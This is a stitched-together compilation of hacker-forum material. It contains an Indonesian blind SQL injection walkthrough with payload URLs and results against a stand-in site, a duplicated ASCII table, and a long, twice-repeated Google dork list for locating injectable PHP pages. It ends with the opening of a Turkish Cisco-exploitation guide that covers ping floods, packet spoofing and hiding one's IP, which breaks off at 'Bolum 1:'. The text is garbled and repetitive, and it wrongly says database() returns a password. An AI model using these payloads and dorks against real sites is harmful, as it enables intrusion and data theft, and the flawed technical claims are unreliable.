? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis
* Contact
cruz3n@jasakom.org
* Blog Sederhana
http://cruzenaldo.co.cc
* Thanks
~ my JESUS CHRIST
~ Bokap dan keluarga dirumah
~ Temen2 di kupang...
~ All Jasakomers yang telah membuat hidup gw penuh warna... ;p
~ Witha Rasmana a.k.a Chrn0 (I Love You...)
Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama
http://iseng.com/news.php?id=76009
Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...
Langsung aja aku ketik
http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE
http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE
Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...
~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.
~ 1,1 adalah urutan dari value tersebut.
~ CHAR adalah peubah dalam desimal
~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65
Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)
TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)
Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)
Cari nilai kedua dan caranya adalah...
http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)
Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...
Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)
Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi
http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)
67=C
82=R
85=U
90=Z
51=3
78=N
Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)
Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...
Contoh:
http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)
Jadi password yang didapat adalah...
75=K
69=E
82=R
69=E
78=N
Jadi username dan passwordnya adalah CRUZ3N dan KEREN...
Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...
Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).
Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna...
Nih kode ASCII yang sapa tau berguna...
Char Code Description
9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< 60 Less-than sign
= 61 Equals sign
> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis
* Contact
cruz3n@jasakom.org
* Blog Sederhana
http://cruzenaldo.co.cc
* Thanks
~ my JESUS CHRIST
~ Bokap dan keluarga dirumah
~ Temen2 di kupang...
~ All Jasakomers yang telah membuat hidup gw penuh warna... ;p
~ Witha Rasmana a.k.a Chrn0 (I Love You...)
new-sql-injection-dork
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"
Exploiting Cisco Systems(Windows)
Exploiting Cisco Systems(Windows)
Bu dokuman bir seri ispatlanmis cisco exploitlerinin sisteme erisim saglamak icin nasil kullanilacagini adim adim anlatacaktir. Eger bir cisco router’a girerken yakalanir ya da sistemi bozarsaniz yuzlerce internet kullanicisini zor durumda birakir, binlerce dolar hasara neden olabilirsiniz, o yuzden sadece izniniz varsa deneyin bunlari J yanlis sekilde kullanilmasi basinizi cok derde sokabilir.
Baslamadan once bilmeniz gerekenler
IP adres nedir?
IP, Internet protokolunun kisaltilmis halidir. IP adresleri bilgisayarlar tarafindan kendilerine baglanmis diger bilgisayarlari taminada kullanilir. Bu IRC den nasil banlandiginizdir ve nasil ISS inizin bulunmasidir. IP adresleri cok kolaylikla alinirlar.
IP adresi bulmak icin su yontemler kullanilir :
Bir websitesine gidersiniz ve IP niz loglanir· IRC de isteyen herkes IP nizi alabilir· ICQ da “IP mi gosterme” secenegini secmis dahi olsaniz yine de IPniz alinabilir· Eger bir yere baglanmissaniz, “systat” yazarak kimin baglanmis oldugunu gorebilirler.· Birisi eger size IP-logging java li bir email gondermisse, ayni zamanda sizin IP nizi de alirBunlardan baska IP adresini almak icin bir cok yontem vardir, back-door programlari sub7 ya da NetBus kullanmak gibiISS nedir?ISS, internet servis saglayicisinin kisaltilmisidir, ve size interneti veren firmadir. Dial-up yapip bir baglanti sagladiginizda baglandiginiz sistemdir. Isteyen birileri sizin ISS inizi size bir traceroute uygulayarak bulabilir ( traceroute daha ilerde aciklanacaktir).
Su sekildedir :
tracert 222.222.22.22Tracing route to [221.223.24.54]over a maximum of 30 hops.1 147ms 122ms 132ms your.isp [222.222.22.21]2 122ms 143ms 123ms isp.firewall [222.222.22.20]3 156ms 142MS 122ms aol.com [207.22.44.33]4 * * * Request timed out5 101ms 102ms 133ms cisco.router [194.33.44.33]6 233ms 143ms 102ms something.ip [111.11.11.11]7 222ms 123ms 213ms netcom.com [122.11.21.21]8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]Trace complete.
TCP/IP packeti nedir?
TCP/I . Transmission Control Protocol and Internet Protocol’unun kisaltilmisidir, bir TCP/IPPacketi sIkistirilmis sonra bir header (baslik) eklenmis ve baska bir bilgisayara gonderilmis blok halinde bir datadir. Butun internet transferlerinin paketler gondererek nasil olustugudur. Bir paketteki header (baslik), paketi gonderen bilgisayarin IP adresini icerir. Bir paketi yeniden yazip herhangi birinden gelmis gibi gosterebilirsiniz.
Bir cok sisteme erisim saglamak icin bunu kullanabilirsiniz ve yakalanmazsiniz.Linux calistiriyor olmaniz ya da bunu yapmanizi saglayacak bir programinizin olmasi gerekir.Ipnizi nasil saklarsiniz:Genius 2 ya da DC IS gibi programlardan birini bulun, bunlar sizin IdentD calistirmaniza izin veriri. Isteginize bagli olarak bilgisayarinizin kimliginin bir parcasinin degistirmenize yardim eder. Bunu IRC chat roomlardan banlandiginizda kullanin… hemencecik geri girersiniz. Ayni zamanda baska bir sisteme erisirken de kullanabilirsiniz, bu sekilde yanlis bir kimligi loglarlar.
Telnet nasil kullanilir:
Telneti kolayca baslat menunuzden calistiri secip telnet yazmak suretiyle acabilirsiniz. Telneti actiktan sonra bazi ozellikleri degistirmek isteyebilirsiniz. Terminal>Preferences uzerine tiklayin. Burdan buffer size ini , fontu ve diger seyleri degistirebilirsiniz. Ayni zamanda “local echo” yuacabilir ya da kapatabilirsiniz. Eger “local echo”yu acarsaniz, bilgisayariniz size yazdiginiz her seyi gosterir, ve bagli bulundugunuz bilgisardakileri de. Boylece bilgisayarinizda “hello” yazdiginizda “hhelelollo” seklinde bir karsilik alirsiniz. Bunun nedeni, bilginin geri gelerek sizin yazdiginizla karismasidir, bu ozelligi sadece bilgisayarin ne yazdigimi bana geri gonderip gondermedigini gormek icin kullanirim.
Default olarak telnet,telnet portundaki ( port 23) bir sisteme baglanir. Her zaman 23uncu porta baglanmak istemeyebilirsiniz, o zaman baglantiya gittiginizde port u mesela 25 e cevirebilirsiniz, ki bu mail serverlarinin portudur. Ya da FTP icin 21 e. Binlerce degisik port vardir, bu yuzden dogru olani sectiginizden emin olun.
HyperTerminal nasil kullanilir ?
HyperTerminal, belirli bir bilgisayara giren bilgiyi dinlemeniz icin kendi bilgisayarinizdan herhangi bir porttan bir server acmaniza musade eder. Bunu kullanmak icin Baslat >> programlar >> donatilar >> iletisim >> HyperTerminal secmeniz yeterli. Once bir baglanti secmeniz gerekir, TCP/IP Winsock I secin, sonra iletisim kuracaginiz bilgisayari yazin, ve port numarasini belirleyin. HyperTerminale inputlari dinlemesini soyleyebilirsiniz su sekilde: Call >> wait for call. Simdi diger bilgisayar size o porttan baglanir ve chat yapabilir dosya transfer edebilirsiniz.
Ping nasil kullanilir :
Ping cok basittir, sadece MS-DOS u acin ve “ping ip adresi “ yazin. Default olarak 3 kere ping yapar, fakat “ping ip adres -t” yazarsaniz sonsuza kadar pingler. Ping buyuklugunu degistirmek icin sunu yapin : "ping -l (size) ip.address" . Pingin yaptigi bir bilgisayara bir data paketi yollamak, ve ne zaman geri donecegini beklemektir, bununla bilgisayarin baglanti hizi ve paketin gidip geri gelmesi esnasinda gecen zaman ( “trip time” olarak adlandirilir ) anlasilir.
Ping ayni zamanda bir sistemi yuklu sayida ping flood ederek yavaslatmak ya da cokertmek icin de kullanilabilir. Windows 98 bir dakikalik ping floodundan sonra cokebilmektedir. Bir ping flood saldirisi hedefinizden cok sizden yuksek oranda bandwidth alir( eger saldirdiginiz bir Windows 98 makine ve sizin modeminiz orta halli birseyse o zaman bir dakika icinde sistemi cokertmeniz mumkun ) . Ping flood kuvvetli hedeflerde etkili olmaz. Not : DOS un -t secenegi ping flood yapmaz, sadece hedegi surekli pingler, bir pingle digerinin arasinda bir ara vererek. Her Unix ve Linux makinelerde, ping -f kullanarak gercek bir ping flood yapabilirsiniz.
Aslinda ping -f distribution ininizin POSIX-compliant olabilmesi icin gereklidir. TraceRoute nasil kullanilir :Baglantinizi izlemek icin ( ve de sizinle hedefiniz olan bilgisayar arasindaki tum bilgisayarlari gorebilmek icin ) sadece MS_DOS acin ve "tracert ip.address" yazin. Boylelikle sizinle hedefiniz arasindaki bilgisayarlarin listesini alirsiniz. Bunu arada herhangi bir seyi blocklayan bir firewall un olup olmadigini anlamak icin kullanabilirsiniz. Ve bununla birlikte bir kisinin ISS ini de anlamaya kullanilabilir bu komut. ISS I ayirt etmek icin listedekien sondan bir onceki IP adresine bakin, bu ISS in routerlarindan birinin adresi olacaktir ihtimalle.
Basitce traceroute soyle calisir :
Bir TCP/IP paketi headerinda ( basliginda ) TTL (time to live ) adi verilen bir deger tasir. Paketin her sekmesinde bu deger bir azalir. Bu sadece bir seylerin yanlis giderek paketin net uzerinde surekli sekmesini ve dolayisiyla bandwidth harcamasini onlemek icindir. Bir paketin TTL I sifir oldugu anda paket olmekte ve bir ICMP hatasi gonderici bilgisayara gonderilmektedir.Simdi, traceroute once TTL degeri 1 olan bir paket gonderir, Bu paket cabucak geri doner,ve ICMP hata basligindaki gonderenin adresine bakarak,traceroute paketin ilk sekmesinde nerde oldugunu gorur. Sonra ikinci bir paket TTL degeri 2 olarak yola cikarilir ve ikinci sekmeden sonra geri doner ve takildigi makinenin kimliginide getirerek. Bu bu sekilde paket hedefine ulasana kadar devam eder.
Proxy server nasil kullanilir ?
Web de istediginiz bir portta calisan bir proxy server aramasi yapin. Bir tane buldugunuzda, telnetle ya da hyperterminalle ona baglanin, sonra dabu server uzerinden baska bir makineye baglanin. Boylelikle diger ucdaki bilgisayar sizin IP adresinizi bilemez.
Bolum 1:
